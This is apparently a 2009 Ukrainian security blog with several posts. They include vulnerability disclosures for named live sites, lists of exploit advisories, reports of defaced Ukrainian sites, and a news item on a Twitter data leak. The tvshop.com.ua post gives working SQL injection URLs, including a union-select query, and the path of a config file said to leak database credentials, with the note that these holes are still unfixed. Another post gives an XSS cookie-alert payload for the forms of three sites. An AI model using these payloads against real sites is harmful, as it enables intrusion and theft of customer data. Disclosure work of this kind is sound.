Уразливості на tvshop.com.ua

19:26 03.07.2009

21.04.2009

У липні, 24.07.2008, я виявив Full path disclosure, SQL Injection та Information Leakage уразливості на сайті http://tvshop.com.ua (інтернет магазин), що також доступний за адресою http://i-shop.com.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливості на www.cddoma.com.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

03.07.2009

Full path disclosure:

http://tvshop.com.ua/itemlist.php?cid=’

http://tvshop.com.ua/item.php

http://tvshop.com.ua/itemlist.php

http://tvshop.com.ua/catalog.php

SQL Injection:

http://tvshop.com.ua/itemlist.php?cid=-1%20or%20version()=4.0

http://tvshop.com.ua/catalog.php?cid=-1%20union%20select%201,version(),1,1,1/*

MySQL 4.0.27-standard-log

Зазначу, що в таблиці клієнтів магазину в БД торік, 24.07.2008, було 17197 записів. А сьогодні, майже через рік, 18112 записів. Тобто майже за рік у магазина збільшилося число клієнтів на 915. А хтось тут про кризис росказує :-) .

Information Leakage:

http://tvshop.com.ua/init.tpl

Витік login, password і name для бази даних та Source Code Disclosure.

Дані уразливості досі не виправлені.

Добірка експлоітів

16:14 03.07.2009

В даній добірці експлоіти в веб додатках:

  • CF_Auction (forummessage) Blind SQL Injection Vulnerability (деталі)
  • CF_Calendar (calendarevent.cfm) Remote SQL Injection Vulnerabilty (деталі)
  • CF SHOPKART 5.2.2 (SQL/DD) Multiple Remote Vulnerabilities (деталі)
  • Butterfly Organizer 2.0.1 (view.php id) SQL Injection Vulnerability (деталі)
  • phpAddEdit 1.3 (editform) Local File Inclusion Vulnerability (деталі)
  • eZ Publish 3.9.0/3.9.5/3.10.1 Command Execution Exploit (admin req) (деталі)
  • MyCal Personal Events Calendar (mycal.mdb) Database Disclosure Vuln (деталі)
  • evCal Events Calendar Database Disclosure Vulnerability (деталі)
  • PhpAddEdit 1.3 (Cookie) Login Bypass Vulnerability (деталі)
  • Banner Exchange Java (Auth Bypass) SQL Injection Vulnerability (деталі)
  • Ad Management Java (Auth Bypass) SQL Injection Vulnerability (деталі)
  • Affiliate Software Java 4.0 (Auth Bypass) SQL Injection Vulnerability (деталі)
  • Feed Cms 1.07.03.19b (lang) Local File Inclusion Vulnerability (деталі)
  • PHP Support Tickets 2.2 Remote File Upload Vulnerability (деталі)
  • Exploits NULL pointer in Remotely Anywhere 8.0.668 (деталі)

Уразливості на www.linkexchanger.ru, www.od.com.ua, і www.lishnih.net

23:58 02.07.2009

У липні, 18.07.2008, я знайшов Cross-Site Scripting уразливості на сайтах http://www.linkexchanger.ru, http://www.od.com.ua і http://www.lishnih.net. Що використовують веб додаток LinksExchanger, про уразливості в якому я писав нещодавно.

XSS:

POST запит на сторінках linkexchanger.ru/dir/submit.php, od.com.ua/links/submit.php і lishnih.net/catalog/submit.php.
"><body onload="alert(document.cookie)В полях: Ваше имя или ник, Текстовое описание Вашей ссылки.

XSS через GET:

http://www.linkexchanger.ru

http://www.od.com.ua

http://www.lishnih.net

Експлоіти для Apache №7

22:35 02.07.2009

Продовжуючи тему експлоітів для Apache, пропоную вам нову добірку експлоітів для цього веб сервера.

Дані експлоіти для уразливостей в Apache Tomcat та Apache mod_dav / svn. Адмінам варто слідкувати за оновленням своїх серверів.

  • Apache Tomcat untime.getRuntime().exec() Privilege Escalation (win) (деталі)
  • Apache mod_dav / svn Remote Denial of Service Exploit (деталі)

Пошкодження пам’яті в Adobe Shockwave Player

20:13 02.07.2009

Виявлене пошкодження пам’яті в Adobe Shockwave Player.

Уразливі версії: Adobe Shockwave Player 11.5.

Пошкодження пам’яті при відкритті файлів Adobe Director 10.

  • Security Update available for Shockwave Player (деталі)
  • Adobe Shockwave Player Director File Parsing Pointer Overwrite Vulnerability (деталі)

Добірка уразливостей

16:40 02.07.2009

В даній добірці уразливості в веб додатках:

  • D-Link DIR-100 long url filter evasion (деталі)
  • Turuncu Galeri [galeri_edit.asp] Permission Bypass Vulnerability (деталі)
  • Sagem router f@st 2404 remote reset poc (деталі)
  • Sagem Router F@ST 2404 Remote Denial Of Service Exploit (деталі)
  • RSS-aggregator Multiple vulnerabilities (деталі)
  • Wordtrans-web Remote Command Execution Vulnerability (деталі)
  • Wordtrans-web Remote Command Execution Vulnerability (деталі)
  • PHP Nuke Platinium <= 7.6.b.5 Remote Code Execution Exploit (деталі)
  • Multiple RFI-LFI in 1024 CMS 1.4.3, 1.4.4 RFC (деталі)
  • Xpoz SQL-INJECTION, XSS (деталі)

Похакані сайти №51

22:47 01.07.2009

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

  • http://www.lingva.odessa.ua (хакером P@RS) - 17.06.2009, зараз сайт вже виправлений адмінами
  • http://solos.bestcrimea.com (хакерами з Hackerz Morocco)
  • http://www.morozova.com.ua (хакером Arfaoui Firas) - 23.06.2009, зараз сайт вже виправлений адмінами
  • http://mttz.donetsk.ukrtelecom.ua (хакером GHoST61) - похакана директорія сайта ЦТЕ МТТЗ Донецької фiлiї ВАТ “Укртелеком”
  • http://chinatractor.com.ua (хакером P@RS) - 16.06.2009, зараз сайт вже виправлений адмінами

Нові побоювання з приводу безпеки даних на Twitter

19:26 01.07.2009

Голосний випадок, що відбувся на Yahoo, змусив деяких замислитися про небезпеку розкриття інформації сервісом мікроблогів Twitter. Адреса електронної пошти, що спливла, належала відомому британському телеведучому Джонатану Россу, порушила питання про те, наскільки складною може бути процедура видалення постів на Twitter.

Початок інциденту було покладено в перші дні тижня, коли Росс відправив особисте повідомлення іншому користувачу Twitter, у якому він вказав адресу своєї персональної електронної пошти. Однак замість того, щоб піти до цього користувача напряму, лист з’явився в загальнодоступному розділі, що скомпрометувало адресу пошти на домені BBC перед 250000 читачами блога Росса. І хоча помилкове повідомлення було незабаром вилучене, його копія виявилася доступною через пошукову систему Yahoo.

Та обставина, що подібні відомості можуть бути виявлені, піддає ризику розголошення як особисту, так і професійну інформацію, оскільки усе більше людей користуються сервісом Twitter і вдома і на робочому місці.

Незважаючи на те, що сайт дозволяє користувачам через запит до адміністрації видаляти небажані повідомлення, Грехам Клулі з Sophos стверджує, що цей процес може бути досить складним і все рівно залишить користувача уразливим на деякий час.

По матеріалам http://www.xakep.ru.

P.S.

В даному випадку мало місце використання кеша пошукових систем (в даному випадку Yahoo, але так само можна використовувати Google та інші пошуковці), щоб отримати доступ до даних, які стали доступними через вітік інформації, які вже прибрали з сайту (в даному випадку з Twitter). Я вже давно запланував написати про подібні речі статтю.

В своїй практиці я давно використовую кеші пошуковців для знаходження Information Leakage уразливостей на сайтах (коли на сайті їх вже прибрали) і вже неодноразово повідомляв власників сайтів про подібні уразливості (про які вони думали, що їх виправили і ніхто цього не побачив). А також використовую кеш Гугла для пошуку свіже похаканих сайтів (в тому числі й тих, що вже були виправлені адмінами).

Добірка експлоітів

16:05 01.07.2009

В даній добірці експлоіти в веб додатках:

  • PostEcards (SQL/DD) Multiple Remote Vulnerabilities (деталі)
  • ProQuiz 1.0 (Auth Bypass) SQL Injection Vulnerability (деталі)
  • Netref 4.0 Multiple Remote SQL Injection Vulnerabilities (деталі)
  • Peel Shopping 3.1 (index.php rubid) SQL Injection Vulnerability (деталі)
  • PHPmyGallery 1.0beta2 (RFI/LFI) Multiple Remote Vulnerabilities (деталі)
  • Poll Pro 2.0 (Auth Bypass) Remote SQL Injection Vulnerability (деталі)
  • Professional Download Assistant 0.1 (Auth Bypass) SQL Injection Vuln (деталі)
  • Pro Chat Rooms 3.0.2 (XSS/CSRF) Multiple Vulnerabilities (деталі)
  • Living Local 1.1 (XSS-RFU) Multiple Remote Vulnerabilities (деталі)
  • Webmaster Marketplace (member.php u) SQL Injection Vulnerability (деталі)
  • eZ Publish < 3.9.5/3.10.1/4.0.1 Privilege Escalation Exploit (деталі)
  • HTMPL 1.11 (htmpl_admin.cgi help) Command Execution Vulnerability (деталі)
  • CF_Forum Blind SQL Injection Vulnerability (деталі)
  • CFMBLOG (index.cfm categorynbr) Blind SQL Injection Vulnerability (деталі)
  • Exploits Timbuktu Pro <= 8.6.5 [RC 229] vulnerabilities (деталі)

Уразливості в плагінах для WordPress №19

23:59 30.06.2009

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах DM Albums і Related Sites. Для котрих з’явилися експлоіти. DM Albums - це плагін для створення фото альбомів та галерей, Related Sites - це плагін для показу лінок на сайти інших користувачів даного плагіна.

  • WordPress Plugin DM Albums 1.9.2 Remote File Inclusion Vuln (деталі)
  • WordPress Plugin DM Albums 1.9.2 Remote File Disclosure Vulnerability (деталі)
  • WordPress Plugin Related Sites 2.1 Blind SQL Injection Vulnerability (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

P.S.

Експлоіт до плагіна Related Sites неробочий, тому що заявлена SQL Injection уразливість відсутня. Тому власники даного плагіна можуть не переживати з приводу цього експлоіта.